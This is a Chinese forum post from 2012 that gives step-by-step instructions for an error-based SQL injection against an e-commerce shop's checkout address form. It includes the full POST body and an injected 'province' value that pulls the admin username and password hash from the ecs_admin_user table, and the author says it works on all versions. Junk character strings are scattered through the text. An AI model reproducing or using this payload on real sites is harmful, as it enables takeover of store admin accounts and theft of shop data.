感谢欠杀的黑盒% N# F9 b/ O1 J& Q& V( E6 Z
. X0 E3 g: I$ Q! q# }
3 Y$ }$ u" j0 S2 f把任意商品加入购物车在填写配送地址那一页,有地区选择* ]+ Y$ y3 L: X9 G' J
s) Z U% X8 n/ z. R+ y5 [+ m
flow.php?step=consignee&direct_shopping=1
9 B6 ~: ~4 i* ^7 o比如省选择安徽6 D) Y( I) G2 w# m+ c
0 Z% X( O d0 m$ T; U: ]/ W
其中POST数据如下
1 w- Z! B9 G8 U
& s6 o. _+ w3 fcountry=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=3
4 _. Y. ]" D4 l& K, t6 c0 g改成
6 ?8 e" e3 L% h: x
9 }4 A6 E$ C0 d( o4 a4 U. D/ Mprovince=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #1 Z! W5 \; U/ X0 E% O& r9 \. H
ps:详细的方法,用火狐tamper data插件……..即可改post内容…..- ]. \* [0 s( X, g8 `. s3 Q
# C8 B& V+ [2 |: z9 {( N) y# e
先注册账户,随便选个商品进购物车,然后填地址,电话什么的,填好开始抓包,改包
1 O) N, j y. I, I" }" h& r% a
$ b. `4 G& \0 R E# v就会回显错误页面了。。。。% e1 U' n+ R9 P' d# B
8 [0 z& u z8 l2 U& m' q我自己没用这个日站过,就测试了一个最新版和老版本,均ok,所以写全版本,理论上应该是的% T# {6 Z% v$ Z2 m0 j O
|
发表于 2012-12-31 09:19:27
收藏
支持
反对